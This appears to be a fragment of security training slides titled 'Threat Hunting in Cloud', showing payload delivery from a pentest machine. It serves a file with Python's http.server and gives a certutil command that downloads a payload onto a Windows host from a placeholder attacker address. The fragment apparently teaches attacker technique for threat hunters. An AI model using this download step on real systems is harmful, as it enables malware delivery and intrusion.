[06] Threat Hunting in Cloud
By:
Prasanna
|
01 Hosting file in Attacker Machine
- Host your payload in your
PentestMachine
$ python3 -m http.server02 Download the file in Windows Machine
PS> certutil -urlcache -split -f http://<Attacker_IP>:<Port>/payload.name C:\temp\payload.name